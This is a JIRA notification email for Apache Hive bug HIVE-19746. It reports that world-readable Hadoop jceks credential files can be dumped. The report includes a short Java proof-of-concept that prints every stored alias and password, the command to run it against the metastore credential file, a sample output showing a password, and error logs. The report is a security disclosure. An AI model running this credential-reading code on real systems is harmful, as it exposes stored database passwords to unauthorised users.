[jira] [Updated] (HIVE-19746) Hadoop credential provider allows to read passwords

Oleksiy Sayankin (JIRA) Thu, 31 May 2018 04:06:16 -0700


     [ 
https://issues.apache.org/jira/browse/HIVE-19746?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]


Oleksiy Sayankin updated HIVE-19746:
------------------------------------
    Description: 
This simple program allows to read any password from any {{jceks}} file:

{code}
package com.test.app;

import java.util.List;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.security.alias.CredentialProvider;
import org.apache.hadoop.security.alias.CredentialProviderFactory;

import java.io.IOException;

public class PasswordReader {
  public static void main(String[] args) throws IOException {
    if (args == null || args.length == 0){
      throw new IllegalArgumentException("Credential provider path is to set");
    }
    String credentialProviderPath = args[0];
    Configuration configuration = new Configuration();
    configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, 
credentialProviderPath);
    CredentialProvider credentialProvider = 
CredentialProviderFactory.getProviders(configuration).get(0);
    List<String> aliases = credentialProvider.getAliases();
    for(String alias : aliases){
      System.out.println(alias + " = " + new 
String(configuration.getPassword(alias)));
    }
  }
}
{code}

{code}
java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader  
jceks://hdfs/user/hive/hivemetastore.jceks
{code}

*RESULT*

{code}
javax.jdo.option.connectionpassword = 123456
{code}

File {{jceks://hdfs/user/hive/hivemetastore.jceks}} has {{\-rw\-r\-\-r\-\-}} 
permissions and {{hdfs:hdfs}} owner:group. We can't remove world readable 
permissions here, because Hive is configured for impersonation to allow users 
user than {{hdfs}} connect to HiveServer2. When removed world readable 
permissions and tried to connect as other user, I got the exception:

{code}
2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure for: 
/user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception 
for: /user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] metastore.RetryingHMSHandler: 
java.lang.RuntimeException: Error getting metastore password: null
    at 
org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
    at 
org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)
{code}

Any ideas how to protect passwords?

  was:
This simple program allows to read any password from any {{jceks}} file:

{code}
package com.test.app;

import java.util.List;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.security.alias.CredentialProvider;
import org.apache.hadoop.security.alias.CredentialProviderFactory;

import java.io.IOException;

public class PasswordReader {
  public static void main(String[] args) throws IOException {
    if (args == null || args.length == 0){
      throw new IllegalArgumentException("Credential provider path is to set");
    }
    String credentialProviderPath = args[0];
    Configuration configuration = new Configuration();
    configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, 
credentialProviderPath);
    CredentialProvider credentialProvider = 
CredentialProviderFactory.getProviders(configuration).get(0);
    List<String> aliases = credentialProvider.getAliases();
    for(String alias : aliases){
      System.out.println(alias + " = " + new 
String(configuration.getPassword(alias)));
    }
  }
}
{code}

{code}
java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader  
jceks://hdfs/user/hive/hivemetastore.jceks
{code}

*RESULT*

{code}
javax.jdo.option.connectionpassword = 123456
{code}

File {{jceks://hdfs/user/hive/hivemetastore.jceks}} has {{\-rw\-r\-\-r\-\-}} 
permissions and {{hdfs:hdfs}} owner:group. We can't remove world readable 
permissions here, because Hive is configured for impersonation to allow users 
user than {{hdfs}} connect to HiveServer2. When removed world readable 
permissions I got the exception:

{code}
2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure for: 
/user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception 
for: /user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] metastore.RetryingHMSHandler: 
java.lang.RuntimeException: Error getting metastore password: null
    at 
org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
    at 
org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)
{code}

Any ideas how to protect passwords?


> Hadoop credential provider allows to read passwords
> ---------------------------------------------------
>
>                 Key: HIVE-19746
>                 URL: https://issues.apache.org/jira/browse/HIVE-19746
>             Project: Hive
>          Issue Type: Bug
>          Components: Security
>            Reporter: Oleksiy Sayankin
>            Assignee: Oleksiy Sayankin
>            Priority: Blocker
>
> This simple program allows to read any password from any {{jceks}} file:
> {code}
> package com.test.app;
> import java.util.List;
> import org.apache.hadoop.conf.Configuration;
> import org.apache.hadoop.security.alias.CredentialProvider;
> import org.apache.hadoop.security.alias.CredentialProviderFactory;
> import java.io.IOException;
> public class PasswordReader {
>   public static void main(String[] args) throws IOException {
>     if (args == null || args.length == 0){
>       throw new IllegalArgumentException("Credential provider path is to 
> set");
>     }
>     String credentialProviderPath = args[0];
>     Configuration configuration = new Configuration();
>     configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, 
> credentialProviderPath);
>     CredentialProvider credentialProvider = 
> CredentialProviderFactory.getProviders(configuration).get(0);
>     List<String> aliases = credentialProvider.getAliases();
>     for(String alias : aliases){
>       System.out.println(alias + " = " + new 
> String(configuration.getPassword(alias)));
>     }
>   }
> }
> {code}
> {code}
> java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader  
> jceks://hdfs/user/hive/hivemetastore.jceks
> {code}
> *RESULT*
> {code}
> javax.jdo.option.connectionpassword = 123456
> {code}
> File {{jceks://hdfs/user/hive/hivemetastore.jceks}} has {{\-rw\-r\-\-r\-\-}} 
> permissions and {{hdfs:hdfs}} owner:group. We can't remove world readable 
> permissions here, because Hive is configured for impersonation to allow users 
> user than {{hdfs}} connect to HiveServer2. When removed world readable 
> permissions and tried to connect as other user, I got the exception:
> {code}
> 2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure 
> for: /user/hive/hivemetastore.jceks, error: Input/output error
> 2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception 
> for: /user/hive/hivemetastore.jceks, error: Input/output error
> 2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] 
> metastore.RetryingHMSHandler: java.lang.RuntimeException: Error getting 
> metastore password: null
>     at 
> org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
>     at 
> org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)
> {code}
> Any ideas how to protect passwords?



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

[jira] [Updated] (HIVE-19746) Hadoop credential provider allows to read passwords

Reply via email to